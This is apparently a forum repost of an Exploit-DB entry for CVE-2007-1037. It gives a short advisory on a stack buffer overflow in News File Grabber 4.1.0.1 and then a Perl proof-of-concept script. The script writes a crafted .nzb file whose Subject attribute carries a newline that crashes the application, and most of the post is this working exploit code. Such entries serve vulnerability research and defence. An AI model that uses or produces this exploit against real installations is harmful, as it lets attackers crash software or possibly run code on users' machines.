Exploit News File Grabber 4.1.0.1 - Subject Line Stack Buffer Overflow (1)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
29617
Проверка EDB
  1. Пройдено
Автор
PARVEEN VASHISHTHA
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2007-1037
Дата публикации
2007-02-19
News File Grabber 4.1.0.1 - Subject Line Stack Buffer Overflow (1)
Код:
source: https://www.securityfocus.com/bid/22617/info

News File Grabber is prone to a remote stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.

Exploiting this issue allows attackers to execute arbitrary machine code in the context of the affected application.

This issue affects version 4.1.0.1; other versions may also be affected. 

#!/usr/bin/perl
# ===============================================================================================
#                News File Grabber Subject Line Stack Buffer Overflow perl exploit 
#                               By Parveen vashishtha ([email protected])
# ==============================================================================================          
# Reference : https://www.securityfocus.com/bid/22617
#
# 
#
# Buffer overflow exists in Subject parameter of the .nzb file
# By Passing a newline char it crashes
# So here you go.
# 
#================================================================================================

use strict;

my($file_header)="<?xml version=\"1.0\" encoding=\"iso-8859-1\" ?>\n".
			"<!DOCTYPE nzb PUBLIC \"-//newzBin//DTD NZB 1.0//EN\" \"http://www.newzbin.com/DTD/nzb/nzb-1.0.dtd\">\n".
			"<!-- NZB Generated by Parveen Vashishtha -->\n".
			"<nzb xmlns=\"http://www.google.com\">\n\n";

my($file_end)="</segment>\n".
"</segments>\n".
"</file>\n".
"</nzb>\n";


open(OUTPUTFILE, ">poc.nzb");                        # Crafted .NZB file 
 
print OUTPUTFILE $file_header;                       # Writing Header

print OUTPUTFILE "<file poster=\"Poster\" date=\"1170609233\"\nsubject=\"";    # Vulnerable SUBJECT parameter

print OUTPUTFILE "\\n";

print OUTPUTFILE "\">\n<groups><group>some group</group></groups>\n<segments>\n<segment bytes=\"30\" number=\"1\">some name";
print OUTPUTFILE $file_end;                                     # End of file


close(OUTFILE);
 
Источник
www.exploit-db.com

Похожие темы